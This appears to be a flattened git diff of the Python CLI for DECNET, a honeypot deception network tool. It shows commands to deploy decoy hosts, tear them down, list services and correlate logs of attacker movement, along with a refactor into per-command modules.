    help="Deploy a deception network of honeypot deckies on your LAN.",
    no_args_is_help=True,
)
# Shared Rich console for status and error output.
console = Console()
|
||||
|
||||
def _all_service_names() -> list[str]:
    """List every service name in the live plugin registry, sorted."""
    registry = all_services()
    return sorted(registry.keys())
|
||||
|
||||
|
||||
def _resolve_distros(
|
||||
distros_explicit: list[str] | None,
|
||||
randomize_distros: bool,
|
||||
n: int,
|
||||
archetype: Archetype | None = None,
|
||||
) -> list[str]:
|
||||
"""Return a list of n distro slugs based on CLI flags or archetype preference."""
|
||||
if distros_explicit:
|
||||
return [distros_explicit[i % len(distros_explicit)] for i in range(n)]
|
||||
if randomize_distros:
|
||||
return [random_distro().slug for _ in range(n)]
|
||||
if archetype:
|
||||
pool = archetype.preferred_distros
|
||||
return [pool[i % len(pool)] for i in range(n)]
|
||||
# Default: cycle through all distros to maximize heterogeneity
|
||||
slugs = list(all_distros().keys())
|
||||
return [slugs[i % len(slugs)] for i in range(n)]
|
||||
|
||||
|
||||
def _build_deckies(
    n: int,
    ips: list[str],
    services_explicit: list[str] | None,
    randomize_services: bool,
    distros_explicit: list[str] | None = None,
    randomize_distros: bool = False,
    archetype: Archetype | None = None,
) -> list[DeckyConfig]:
    """Build one :class:`DeckyConfig` per entry in *ips*.

    Deckies are named ``decky-01``, ``decky-02``, … in IP order. Distros
    come from :func:`_resolve_distros`. The service list is taken from
    the first applicable source: ``services_explicit``, the archetype's
    services, or a random draw of 1–3 services. With none of these the
    command exits with status 1.

    Random draws are retried (up to 21 draws per decky) to avoid handing
    the same service combination to two deckies.
    """
    seen_combos: set[frozenset] = set()

    def _draw_services() -> list[str]:
        # Redraw until the combination is new; after 21 draws accept a
        # repeat rather than loop forever on a small registry.
        pool = _all_service_names()
        combo: frozenset = frozenset()
        for _ in range(21):
            size = random.randint(1, min(3, len(pool)))
            combo = frozenset(random.sample(pool, size))
            if combo not in seen_combos:
                break
        seen_combos.add(combo)
        return list(combo)

    slugs = _resolve_distros(distros_explicit, randomize_distros, n, archetype)
    built = []
    for index, ip in enumerate(ips):
        distro = get_distro(slugs[index])
        hostname = random_hostname(distro.slug)

        if services_explicit:
            services = services_explicit
        elif archetype:
            services = list(archetype.services)
        elif randomize_services:
            services = _draw_services()
        else:
            typer.echo("Error: provide --services, --archetype, or --randomize-services.", err=True)
            raise typer.Exit(1)

        built.append(
            DeckyConfig(
                name=f"decky-{index + 1:02d}",
                ip=ip,
                services=services,
                distro=distro.slug,
                base_image=distro.image,
                build_base=distro.build_base,
                hostname=hostname,
                archetype=archetype.slug if archetype else None,
                nmap_os=archetype.nmap_os if archetype else "linux",
            )
        )
    return built
|
||||
|
||||
|
||||
def _build_deckies_from_ini(
    ini: IniConfig,
    subnet_cidr: str,
    gateway: str,
    host_ip: str,
    randomize: bool,
) -> list[DeckyConfig]:
    """Build DeckyConfig list from an IniConfig, auto-allocating missing IPs.

    Args:
        ini: Parsed INI config; one decky is built per ``ini.deckies`` entry.
        subnet_cidr: Subnet from which missing IPs are allocated.
        gateway: Gateway address, excluded from auto-allocation.
        host_ip: Host address, excluded from auto-allocation.
        randomize: Allow random service selection for specs that name
            neither services nor an archetype.

    Returns:
        The configs in the same order as ``ini.deckies``.

    Raises:
        typer.Exit: Unknown archetype, unknown service name, or a spec
            with no way to determine its services.
        RuntimeError: The subnet has no free address left.
    """
    from ipaddress import IPv4Address, IPv4Network

    # Addresses pinned in the INI must never be handed out automatically.
    explicit_ips: set[IPv4Address] = {
        IPv4Address(s.ip) for s in ini.deckies if s.ip
    }

    net = IPv4Network(subnet_cidr, strict=False)
    reserved = {
        net.network_address,
        net.broadcast_address,
        IPv4Address(gateway),
        IPv4Address(host_ip),
    } | explicit_ips

    # Lazy generator: each ``next()`` below consumes one free address.
    auto_pool = (str(addr) for addr in net.hosts() if addr not in reserved)

    deckies: list[DeckyConfig] = []
    for spec in ini.deckies:
        # Resolve archetype (if any) — explicit services override its service list
        arch: Archetype | None = None
        if spec.archetype:
            try:
                arch = get_archetype(spec.archetype)
            except ValueError as e:
                console.print(f"[red]{e}[/]")
                raise typer.Exit(1)

        # Distro: cycle the archetype's preferred list when an archetype
        # is set, otherwise cycle through every known distro.
        distro_pool = arch.preferred_distros if arch else list(all_distros().keys())
        distro = get_distro(distro_pool[len(deckies) % len(distro_pool)])
        hostname = random_hostname(distro.slug)

        ip = spec.ip or next(auto_pool, None)
        if ip is None:
            raise RuntimeError(
                f"Not enough free IPs in {subnet_cidr} while assigning IP for '{spec.name}'."
            )

        # Service priority: explicit INI list > archetype > random draw.
        if spec.services:
            known = set(_all_service_names())
            unknown = [s for s in spec.services if s not in known]
            if unknown:
                console.print(
                    f"[red]Unknown service(s) in [{spec.name}]: {unknown}. "
                    f"Available: {_all_service_names()}[/]"
                )
                raise typer.Exit(1)
            svc_list = spec.services
        elif arch:
            svc_list = list(arch.services)
        elif randomize:
            svc_pool = _all_service_names()
            count = random.randint(1, min(3, len(svc_pool)))
            svc_list = random.sample(svc_pool, count)
        else:
            console.print(
                f"[red]Decky '[{spec.name}]' has no services= in config. "
                "Add services=, archetype=, or use --randomize-services.[/]"
            )
            raise typer.Exit(1)

        # nmap_os priority: explicit INI key > archetype default > "linux"
        resolved_nmap_os = spec.nmap_os or (arch.nmap_os if arch else "linux")
        deckies.append(DeckyConfig(
            name=spec.name,
            ip=ip,
            services=svc_list,
            distro=distro.slug,
            base_image=distro.image,
            build_base=distro.build_base,
            hostname=hostname,
            archetype=arch.slug if arch else None,
            service_config=spec.service_config,
            nmap_os=resolved_nmap_os,
        ))
    return deckies
|
||||
|
||||
|
||||
@app.command()
def deploy(
    mode: str = typer.Option(
        "unihost", "--mode", "-m",
        help="Deployment mode: unihost | swarm",
    ),
    deckies: Optional[int] = typer.Option(
        None, "--deckies", "-n",
        help="Number of deckies to deploy (required without --config)",
        min=1,
    ),
    interface: Optional[str] = typer.Option(
        None, "--interface", "-i",
        help="Host NIC (auto-detected if omitted)",
    ),
    subnet: Optional[str] = typer.Option(
        None, "--subnet",
        help="LAN subnet CIDR (auto-detected if omitted)",
    ),
    ip_start: Optional[str] = typer.Option(
        None, "--ip-start",
        help="First decky IP (auto if omitted)",
    ),
    services: Optional[str] = typer.Option(
        None, "--services",
        help="Comma-separated services, e.g. ssh,smb,rdp",
    ),
    randomize_services: bool = typer.Option(
        False, "--randomize-services",
        help="Assign random services to each decky",
    ),
    distro: Optional[str] = typer.Option(
        None, "--distro",
        help="Comma-separated distro slugs, e.g. debian,ubuntu22,rocky9",
    ),
    randomize_distros: bool = typer.Option(
        False, "--randomize-distros",
        help="Assign a random distro to each decky",
    ),
    log_target: Optional[str] = typer.Option(
        None, "--log-target",
        help="Forward logs to ip:port (e.g. 192.168.1.5:5140)",
    ),
    log_file: Optional[str] = typer.Option(
        None, "--log-file",
        help="Write RFC 5424 syslog to this path inside containers (e.g. /var/log/decnet/decnet.log)",
    ),
    archetype_name: Optional[str] = typer.Option(
        None, "--archetype", "-a",
        help="Machine archetype slug (e.g. linux-server, windows-workstation)",
    ),
    dry_run: bool = typer.Option(
        False, "--dry-run",
        help="Generate compose file without starting containers",
    ),
    no_cache: bool = typer.Option(
        False, "--no-cache",
        help="Force rebuild all images, ignoring Docker layer cache",
    ),
    ipvlan: bool = typer.Option(
        False, "--ipvlan",
        help="Use IPvlan L2 instead of MACVLAN (required on WiFi interfaces)",
    ),
    config_file: Optional[str] = typer.Option(
        None, "--config", "-c",
        help="Path to INI config file",
    ),
) -> None:
    """Deploy deckies to the LAN."""
    # Reject unsupported modes before any interface/subnet detection runs.
    if mode not in {"unihost", "swarm"}:
        console.print("[red]--mode must be 'unihost' or 'swarm'[/]")
        raise typer.Exit(1)

    if config_file:
        # ---- INI-driven deployment --------------------------------------
        try:
            ini_cfg = load_ini(config_file)
        except FileNotFoundError as err:
            console.print(f"[red]{err}[/]")
            raise typer.Exit(1)

        # Precedence for network settings: CLI flag, then INI value, then
        # auto-detection.
        iface = interface or ini_cfg.interface or detect_interface()
        subnet_cidr = subnet or ini_cfg.subnet
        effective_gateway = ini_cfg.gateway
        if subnet_cidr is None:
            # No subnet from either source: take both values from detection.
            subnet_cidr, effective_gateway = detect_subnet(iface)
        elif effective_gateway is None:
            # Subnet is known but the gateway is not: detect the gateway only.
            _, effective_gateway = detect_subnet(iface)

        host_ip = get_host_ip(iface)
        banner = (
            f"[dim]Config:[/] {config_file} [dim]Interface:[/] {iface} "
            f"[dim]Subnet:[/] {subnet_cidr} [dim]Gateway:[/] {effective_gateway} "
            f"[dim]Host IP:[/] {host_ip}"
        )
        console.print(banner)

        # Bring-your-own services must be registered before the fleet is
        # built, otherwise their names would be rejected as unknown.
        if ini_cfg.custom_services:
            from decnet.custom_service import CustomService
            from decnet.services.registry import register_custom_service

            for custom in ini_cfg.custom_services:
                service = CustomService(
                    name=custom.name,
                    image=custom.image,
                    exec_cmd=custom.exec_cmd,
                    ports=custom.ports,
                )
                register_custom_service(service)

        effective_log_target = log_target or ini_cfg.log_target
        effective_log_file = log_file
        fleet = _build_deckies_from_ini(
            ini_cfg, subnet_cidr, effective_gateway, host_ip, randomize_services
        )
    else:
        # ---- Flag-driven deployment -------------------------------------
        if deckies is None:
            console.print("[red]--deckies is required when --config is not used.[/]")
            raise typer.Exit(1)

        requested_services = None
        if services:
            requested_services = [name.strip() for name in services.split(",")]
        if requested_services:
            registered = set(_all_service_names())
            unknown = [name for name in requested_services if name not in registered]
            if unknown:
                console.print(f"[red]Unknown service(s): {unknown}. Available: {_all_service_names()}[/]")
                raise typer.Exit(1)

        # Resolve the archetype slug (if any) into its profile.
        arch: Archetype | None = None
        if archetype_name:
            try:
                arch = get_archetype(archetype_name)
            except ValueError as err:
                console.print(f"[red]{err}[/]")
                raise typer.Exit(1)

        # At least one source of services is required.
        if not (requested_services or randomize_services or arch):
            console.print("[red]Specify --services, --archetype, or --randomize-services.[/]")
            raise typer.Exit(1)

        iface = interface or detect_interface()
        # Detection always runs; its subnet is used only when --subnet was
        # not given, while its gateway is used in both cases.
        detected_cidr, effective_gateway = detect_subnet(iface)
        subnet_cidr = detected_cidr if subnet is None else subnet

        host_ip = get_host_ip(iface)
        console.print(f"[dim]Interface:[/] {iface} [dim]Subnet:[/] {subnet_cidr} "
                      f"[dim]Gateway:[/] {effective_gateway} [dim]Host IP:[/] {host_ip}")

        requested_distros = None
        if distro:
            requested_distros = [slug.strip() for slug in distro.split(",")]
        if requested_distros:
            # get_distro() is called only for validation here; the result
            # is discarded.
            try:
                for slug in requested_distros:
                    get_distro(slug)
            except ValueError as err:
                console.print(f"[red]{err}[/]")
                raise typer.Exit(1)

        ips = allocate_ips(subnet_cidr, effective_gateway, host_ip, deckies, ip_start)
        fleet = _build_deckies(
            deckies, ips, requested_services, randomize_services,
            distros_explicit=requested_distros, randomize_distros=randomize_distros,
            archetype=arch,
        )
        effective_log_target = log_target
        effective_log_file = log_file

    decnet_config = DecnetConfig(
        mode=mode,
        interface=iface,
        subnet=subnet_cidr,
        gateway=effective_gateway,
        deckies=fleet,
        log_target=effective_log_target,
        log_file=effective_log_file,
        ipvlan=ipvlan,
    )

    # The reachability probe is advisory: it warns but never aborts, and is
    # skipped entirely on dry runs.
    if effective_log_target and not dry_run:
        from decnet.logging.forwarder import probe_log_target

        if not probe_log_target(effective_log_target):
            console.print(f"[yellow]Warning: log target {effective_log_target} is unreachable. "
                          "Logs will be lost if it stays down.[/]")

    from decnet.deployer import deploy as _deploy

    _deploy(decnet_config, dry_run=dry_run, no_cache=no_cache)
|
||||
|
||||
|
||||
@app.command()
def status() -> None:
    """Show running deckies and their status."""
    # Imported at call time, so the deployer module is only loaded when
    # this command actually runs.
    from decnet.deployer import status as _show_status

    _show_status()
|
||||
|
||||
|
||||
@app.command()
def teardown(
    all_: bool = typer.Option(
        False, "--all",
        help="Tear down all deckies and remove network",
    ),
    id_: Optional[str] = typer.Option(
        None, "--id",
        help="Tear down a specific decky by name",
    ),
) -> None:
    """Stop and remove deckies."""
    # One of the two selectors must be supplied.
    if not (all_ or id_):
        console.print("[red]Specify --all or --id <name>.[/]")
        raise typer.Exit(1)

    from decnet.deployer import teardown as _run_teardown

    # Only the --id value is forwarded; with --all alone it is None.
    _run_teardown(decky_id=id_)
|
||||
|
||||
|
||||
@app.command(name="services")
def list_services() -> None:
    """List all registered honeypot service plugins."""
    registry = all_services()

    table = Table(title="Available Services", show_lines=True)
    for header, column_opts in (
        ("Name", {"style": "bold cyan"}),
        ("Ports", {}),
        ("Image", {}),
    ):
        table.add_column(header, **column_opts)

    # One row per plugin, ordered by service name.
    for name in sorted(registry):
        plugin = registry[name]
        port_list = ", ".join(map(str, plugin.ports))
        table.add_row(name, port_list, plugin.default_image)

    console.print(table)
|
||||
|
||||
|
||||
@app.command(name="distros")
def list_distros() -> None:
    """List all available OS distro profiles for deckies."""
    table = Table(title="Available Distro Profiles", show_lines=True)
    for header, column_opts in (
        ("Slug", {"style": "bold cyan"}),
        ("Display Name", {}),
        ("Docker Image", {"style": "dim"}),
    ):
        table.add_column(header, **column_opts)

    # One row per profile, ordered by slug.
    profiles = all_distros()
    for slug in sorted(profiles):
        entry = profiles[slug]
        table.add_row(slug, entry.display_name, entry.image)

    console.print(table)
|
||||
|
||||
|
||||
@app.command(name="correlate")
def correlate(
    log_file: Optional[str] = typer.Option(
        None, "--log-file", "-f",
        help="Path to DECNET syslog file to analyse",
    ),
    min_deckies: int = typer.Option(
        2, "--min-deckies", "-m",
        help="Minimum number of distinct deckies an IP must touch to be reported",
    ),
    output: str = typer.Option(
        "table", "--output", "-o",
        help="Output format: table | json | syslog",
    ),
    emit_syslog: bool = typer.Option(
        False, "--emit-syslog",
        help="Also print traversal events as RFC 5424 lines (for SIEM piping)",
    ),
) -> None:
    """Analyse logs for cross-decky traversals and print the attacker movement graph."""
    import sys
    import json as _json
    from pathlib import Path
    from decnet.correlation.engine import CorrelationEngine

    engine = CorrelationEngine()

    # Input source: an explicit file wins; otherwise piped stdin; an
    # interactive terminal with no file is an error.
    if log_file:
        source = Path(log_file)
        if not source.exists():
            console.print(f"[red]Log file not found: {log_file}[/]")
            raise typer.Exit(1)
        engine.ingest_file(source)
    elif sys.stdin.isatty():
        console.print("[red]Provide --log-file or pipe log data via stdin.[/]")
        raise typer.Exit(1)
    else:
        for raw_line in sys.stdin:
            engine.ingest(raw_line)

    traversals = engine.traversals(min_deckies)

    if output == "json":
        payload = _json.dumps(engine.report_json(min_deckies), indent=2)
        console.print_json(payload)
    elif output == "syslog":
        for record in engine.traversal_syslog_lines(min_deckies):
            typer.echo(record)
    elif not traversals:
        # Any other --output value is treated as the table format.
        console.print(
            f"[yellow]No traversals detected "
            f"(min_deckies={min_deckies}, events_indexed={engine.events_indexed}).[/]"
        )
    else:
        # NOTE(review): the flattened source does not show whether this
        # summary is printed only alongside the table or also after the
        # "no traversals" notice; it is kept with the table here. Confirm
        # against the original file.
        console.print(engine.report_table(min_deckies))
        console.print(
            f"[dim]Parsed {engine.lines_parsed} lines · "
            f"indexed {engine.events_indexed} events · "
            f"{len(engine.all_attackers())} unique IPs · "
            f"[bold]{len(traversals)}[/] traversal(s)[/]"
        )

    # Emitted in addition to whichever primary format was selected.
    if emit_syslog:
        for record in engine.traversal_syslog_lines(min_deckies):
            typer.echo(record)
|
||||
|
||||
|
||||
@app.command(name="archetypes")
def list_archetypes() -> None:
    """List all machine archetype profiles."""
    table = Table(title="Machine Archetypes", show_lines=True)
    for header, column_opts in (
        ("Slug", {"style": "bold cyan"}),
        ("Display Name", {}),
        ("Default Services", {"style": "green"}),
        ("Description", {"style": "dim"}),
    ):
        table.add_column(header, **column_opts)

    # One row per archetype, ordered by slug.
    profiles = all_archetypes()
    for slug in sorted(profiles):
        profile = profiles[slug]
        default_services = ", ".join(profile.services)
        table.add_row(slug, profile.display_name, default_services, profile.description)

    console.print(table)
|
||||
@@ -1,90 +0,0 @@
|
||||
"""
|
||||
DECNET CLI — entry point for all commands.
|
||||
|
||||
Usage:
|
||||
decnet deploy --mode unihost --deckies 5 --randomize-services
|
||||
decnet status
|
||||
decnet teardown [--all | --id decky-01]
|
||||
decnet services
|
||||
|
||||
Layout: each command module exports ``register(app)`` which attaches its
|
||||
commands to the passed Typer app. ``__init__.py`` builds the root app,
|
||||
calls every module's ``register`` in order, then runs the master-only
|
||||
gate. The gate must fire LAST so it sees the fully-populated dispatch
|
||||
table before filtering.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import (
|
||||
agent,
|
||||
api,
|
||||
bus,
|
||||
canary,
|
||||
db,
|
||||
deploy,
|
||||
forwarder,
|
||||
geoip,
|
||||
init,
|
||||
inventory,
|
||||
lifecycle,
|
||||
listener,
|
||||
orchestrator,
|
||||
profiler,
|
||||
realism,
|
||||
reconciler,
|
||||
sniffer,
|
||||
swarm,
|
||||
swarmctl,
|
||||
topology,
|
||||
updater,
|
||||
web,
|
||||
webhook,
|
||||
workers,
|
||||
)
|
||||
from .gating import _gate_commands_by_mode
|
||||
from .utils import console as console, log as log
|
||||
|
||||
# Root Typer application; every command module attaches itself to it below.
app = typer.Typer(
    name="decnet",
    help="Deploy a deception network of honeypot deckies on your LAN.",
    no_args_is_help=True,
)

# Registration order is deliberate: it mirrors the old flat layout so that
# `decnet --help` lists commands in the same sequence as before.
for _mod in (
    api,
    swarmctl,
    agent,
    updater,
    listener,
    forwarder,
    swarm,
    deploy,
    lifecycle,
    workers,
    inventory,
    web,
    profiler,
    orchestrator,
    realism,
    reconciler,
    sniffer,
    db,
    topology,
    bus,
    geoip,
    init,
    webhook,
    canary,
):
    _mod.register(app)

# The gate runs last so it sees the fully-populated command table.
_gate_commands_by_mode(app)
|
||||
|
||||
# Backwards-compat re-exports. Tests and third-party tooling import these
|
||||
# directly from ``decnet.cli``; the refactor must keep them resolvable.
|
||||
from .db import _db_reset_mysql_async # noqa: E402,F401
|
||||
from .gating import ( # noqa: E402,F401
|
||||
MASTER_ONLY_COMMANDS,
|
||||
MASTER_ONLY_GROUPS,
|
||||
_agent_mode_active,
|
||||
_require_master_mode,
|
||||
)
|
||||
from .utils import ( # noqa: E402,F401
|
||||
_daemonize,
|
||||
_http_request,
|
||||
_is_running,
|
||||
_kill_all_services,
|
||||
_pid_dir,
|
||||
_service_registry,
|
||||
_spawn_detached,
|
||||
_swarmctl_base_url,
|
||||
)
|
||||
|
||||
|
||||
if __name__ == "__main__": # pragma: no cover
|
||||
app()
|
||||
@@ -1,64 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import pathlib as _pathlib
|
||||
import sys as _sys
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    # Attaches the `agent` command to the given Typer app.
    @app.command()
    def agent(
        port: int = typer.Option(8765, "--port", help="Port for the worker agent"),
        host: str = typer.Option("0.0.0.0", "--host", help="Bind address for the worker agent"),  # nosec B104
        agent_dir: Optional[str] = typer.Option(
            None, "--agent-dir",
            help="Worker cert bundle dir (default: ~/.decnet/agent, expanded under the running user's HOME — set this when running as sudo/root)",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
        no_forwarder: bool = typer.Option(
            False, "--no-forwarder",
            help="Do not auto-spawn the log forwarder alongside the agent",
        ),
    ) -> None:
        """Run the DECNET SWARM worker agent (requires a cert bundle in ~/.decnet/agent/).

        By default, `decnet agent` auto-spawns `decnet forwarder` as a fully-
        detached sibling process so worker logs start flowing to the master
        without a second manual invocation. The forwarder survives agent
        restarts and crashes — if it dies on its own, restart it manually
        with `decnet forwarder --daemon …`. Pass --no-forwarder to skip.
        """
        from decnet.agent import server as _agent_server
        from decnet.env import DECNET_SWARM_MASTER_HOST, DECNET_AGENT_LOG_FILE
        from decnet.swarm import pki as _pki

        # An explicit --agent-dir wins over the PKI module's default.
        if agent_dir:
            resolved_dir = _pathlib.Path(agent_dir)
        else:
            resolved_dir = _pki.DEFAULT_AGENT_DIR

        if daemon:
            log.info("agent daemonizing host=%s port=%d", host, port)
            _utils._daemonize()

        if not no_forwarder:
            if DECNET_SWARM_MASTER_HOST:
                syslog_port = int(os.environ.get("DECNET_SWARM_SYSLOG_PORT", "6514"))
                fw_argv = [
                    _sys.executable, "-m", "decnet", "forwarder",
                    "--master-host", DECNET_SWARM_MASTER_HOST,
                    "--master-port", str(syslog_port),
                    "--agent-dir", str(resolved_dir),
                    "--log-file", str(DECNET_AGENT_LOG_FILE),
                    "--daemon",
                ]
                # Best effort: a failed spawn is reported but never stops
                # the agent from starting.
                try:
                    fw_pid = _utils._spawn_detached(fw_argv, _utils._pid_dir() / "forwarder.pid")
                    log.info("agent auto-spawned forwarder pid=%d master=%s", fw_pid, DECNET_SWARM_MASTER_HOST)
                    console.print(f"[dim]Auto-spawned forwarder (pid {fw_pid}) → {DECNET_SWARM_MASTER_HOST}.[/]")
                except Exception as exc:  # noqa: BLE001
                    log.warning("agent could not auto-spawn forwarder: %s", exc)
                    console.print(f"[yellow]forwarder auto-spawn skipped: {exc}[/]")
            else:
                log.info("agent skipping forwarder auto-spawn (DECNET_SWARM_MASTER_HOST unset)")

        log.info("agent command invoked host=%s port=%d dir=%s", host, port, resolved_dir)
        console.print(f"[green]Starting DECNET worker agent on {host}:{port} (mTLS)...[/]")

        # A non-zero return from the server becomes the CLI exit status.
        exit_code = _agent_server.run(host, port, agent_dir=resolved_dir)
        if exit_code != 0:
            raise typer.Exit(exit_code)
|
||||
@@ -1,53 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import os
|
||||
import signal
|
||||
import subprocess # nosec B404
|
||||
import sys
|
||||
|
||||
import typer
|
||||
|
||||
from decnet.env import DECNET_API_HOST, DECNET_API_PORT, DECNET_INGEST_LOG_FILE
|
||||
|
||||
from . import utils as _utils
|
||||
from .gating import _require_master_mode
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    # Attaches the `api` command to the given Typer app.
    @app.command()
    def api(
        port: int = typer.Option(
            DECNET_API_PORT, "--port",
            help="Port for the backend API",
        ),
        host: str = typer.Option(
            DECNET_API_HOST, "--host",
            help="Host IP for the backend API",
        ),
        log_file: str = typer.Option(
            DECNET_INGEST_LOG_FILE, "--log-file",
            help="Path to the DECNET log file to monitor",
        ),
        daemon: bool = typer.Option(
            False, "--daemon", "-d",
            help="Detach to background as a daemon process",
        ),
        workers: int = typer.Option(
            1, "--workers", "-w",
            min=1,
            help="Number of uvicorn worker processes",
        ),
    ) -> None:
        """Run the DECNET API and Web Dashboard in standalone mode."""
        _require_master_mode("api")

        if daemon:
            log.info("API daemonizing host=%s port=%d workers=%d", host, port, workers)
            _utils._daemonize()

        log.info("API command invoked host=%s port=%d workers=%d", host, port, workers)
        console.print(f"[green]Starting DECNET API on {host}:{port} (workers={workers})...[/]")

        # The child reads the ingest log path from its environment.
        child_env: dict[str, str] = os.environ.copy()
        child_env["DECNET_INGEST_LOG_FILE"] = str(log_file)

        uvicorn_argv = [
            sys.executable, "-m", "uvicorn", "decnet.web.api:app",
            "--host", host,
            "--port", str(port),
            "--workers", str(workers),
        ]

        try:
            # start_new_session=True gives uvicorn its own process group, so
            # killpg() below signals that whole group.
            server = subprocess.Popen(uvicorn_argv, env=child_env, start_new_session=True)  # nosec B603 B404
            try:
                server.wait()
            except KeyboardInterrupt:
                # Ctrl-C: ask the group to stop, then force-kill it if it
                # has not exited within 10 seconds.
                try:
                    os.killpg(server.pid, signal.SIGTERM)
                    try:
                        server.wait(timeout=10)
                    except subprocess.TimeoutExpired:
                        os.killpg(server.pid, signal.SIGKILL)
                        server.wait()
                except ProcessLookupError:
                    # The group is already gone; nothing left to signal.
                    pass
        except (FileNotFoundError, subprocess.SubprocessError):
            console.print("[red]Failed to start API. Ensure 'uvicorn' is installed in the current environment.[/]")
|
||||
@@ -1,45 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    # Attaches the `bus` command to the given Typer app.
    @app.command(name="bus")
    def bus_cmd(
        socket_path: str = typer.Option(
            None,
            "--socket",
            "-s",
            help="UNIX socket path (defaults to DECNET_BUS_SOCKET env var, "
                 "then /run/decnet/bus.sock, then ~/.decnet/bus.sock).",
        ),
        group: str = typer.Option(
            "decnet",
            "--group",
            "-g",
            help="POSIX group to chown the socket to (falls back to process "
                 "group if the named group does not exist).",
        ),
        heartbeat: int = typer.Option(
            10,
            "--heartbeat",
            "-H",
            help="Seconds between system.bus.health heartbeat events.",
        ),
        daemon: bool = typer.Option(
            False,
            "--daemon",
            "-d",
            help="Detach to background as a daemon process.",
        ),
    ) -> None:
        """Run the DECNET ServiceBus worker (host-local UNIX-socket pub/sub)."""
        import asyncio
        from decnet.bus.factory import _default_socket_path
        from decnet.bus.worker import bus_worker

        # Fall back to the factory's default path only when --socket is
        # missing or empty.
        resolved = socket_path if socket_path else _default_socket_path()

        if daemon:
            log.info("bus daemonizing socket=%s", resolved)
            _utils._daemonize()

        log.info("bus starting socket=%s group=%s heartbeat=%ds", resolved, group, heartbeat)
        console.print(f"[bold cyan]Bus starting[/] (socket: {resolved}, heartbeat: {heartbeat}s)")

        worker = bus_worker(resolved, group=group, heartbeat_interval=heartbeat)
        try:
            asyncio.run(worker)
        except KeyboardInterrupt:
            # Ctrl-C is the normal way to stop a foreground worker.
            console.print("\n[yellow]Bus stopped.[/]")
|
||||
@@ -1,42 +0,0 @@
|
||||
"""``decnet canary`` — HTTP + DNS callback receiver for canary tokens.
|
||||
|
||||
Worker process. Mirrors the shape of :mod:`decnet.cli.webhook`: a
|
||||
``@app.command(name="canary")`` Typer entry point that delegates to
|
||||
:func:`decnet.canary.worker.run`.
|
||||
|
||||
Not master-only — any host that hosts deckies can run its own
|
||||
canary worker (the bus events stay local; the webhook worker on
|
||||
each host fans them out to SIEMs independently per the design
|
||||
in ``development/let-s-move-to-the-enumerated-pike.md``).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import typer
|
||||
|
||||
from . import utils as _utils
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def register(app: typer.Typer) -> None:
    # Attaches the `canary` command to the given Typer app.
    @app.command(name="canary")
    def canary_cmd(
        daemon: bool = typer.Option(
            False,
            "--daemon",
            "-d",
            help="Detach to background as a daemon process",
        ),
    ) -> None:
        """Run the canary HTTP + DNS callback receiver."""
        import asyncio

        from decnet.canary.worker import run as _run_worker

        if daemon:
            log.info("canary daemonizing")
            _utils._daemonize()

        log.info("canary starting")
        console.print("[bold cyan]Canary callback receiver starting[/]")

        try:
            asyncio.run(_run_worker())
        except KeyboardInterrupt:
            # Ctrl-C is the normal way to stop a foreground worker.
            console.print("\n[yellow]Canary worker stopped.[/]")
|
||||
141
decnet/cli/db.py
141
decnet/cli/db.py
@@ -1,141 +0,0 @@
|
||||
from __future__ import annotations
|
||||
|
||||
from typing import Optional
|
||||
|
||||
import typer
|
||||
from rich.table import Table
|
||||
|
||||
from .utils import console, log
|
||||
|
||||
|
||||
def _decnet_tables() -> tuple[str, ...]:
    """Return the names of all DECNET-managed tables, children before parents.

    The names come from ``SQLModel.metadata.sorted_tables``, the same
    registry that drives ``create_all``. A newly added model is therefore
    picked up by ``db-reset`` automatically. An earlier hand-maintained list
    drifted several times and missed ``webhook_subscriptions``,
    ``session_profile`` and ``smtp_targets``.

    ``sorted_tables`` is parent-first, which is the safe order for
    ``CREATE``. Dropping needs the opposite order so that tables holding
    foreign keys go before the tables they reference. The MySQL reset path
    also disables FK checks, which makes the order irrelevant there, but
    returning the reversed order keeps this helper correct for a backend
    that cannot disable the check.
    """
    from sqlmodel import SQLModel
    # Importing the models package is what registers each table on
    # SQLModel.metadata; the module itself is not used afterwards.
    import decnet.web.db.models  # noqa: F401

    names = [table.name for table in SQLModel.metadata.sorted_tables]
    names.reverse()
    return tuple(names)
|
||||
|
||||
|
||||
async def _db_reset_mysql_async(dsn: str, mode: str, confirm: bool) -> None:
    """Report row counts for every DECNET table and optionally wipe them.

    This lives outside the Typer wrapper so tests can drive it without
    spawning a Typer runner.

    Args:
        dsn: Async SQLAlchemy URL of the target database.
        mode: ``"truncate"`` issues ``TRUNCATE TABLE``; any other value
            issues ``DROP TABLE``.
        confirm: When false, only the summary table is printed and nothing
            is modified.
    """
    from urllib.parse import urlparse
    from sqlalchemy import text
    from sqlalchemy.ext.asyncio import create_async_engine

    db_name = urlparse(dsn).path.lstrip("/") or "(default)"
    engine = create_async_engine(dsn)
    table_names = _decnet_tables()

    # Choose the SQL verb and its progress label once, not per table.
    if mode == "truncate":
        statement, label = "TRUNCATE TABLE", "TRUNCATE"
    else:
        statement, label = "DROP TABLE", "DROP TABLE"

    try:
        # Pass 1: count rows. A count of -1 marks a table that could not be
        # queried (treated as missing).
        counts: dict[str, int] = {}
        async with engine.connect() as conn:
            for name in table_names:
                try:
                    result = await conn.execute(text(f"SELECT COUNT(*) FROM `{name}`"))  # nosec B608
                    counts[name] = result.scalar() or 0
                except Exception:  # noqa: BLE001 — ProgrammingError for missing table varies by driver
                    counts[name] = -1

        summary = Table(title=f"DECNET MySQL reset — database `{db_name}` (mode={mode})")
        summary.add_column("Table", style="cyan")
        summary.add_column("Rows", justify="right")
        for name, count in counts.items():
            shown = "[dim]missing[/]" if count < 0 else f"{count:,}"
            summary.add_row(name, shown)
        console.print(summary)

        if not confirm:
            console.print(
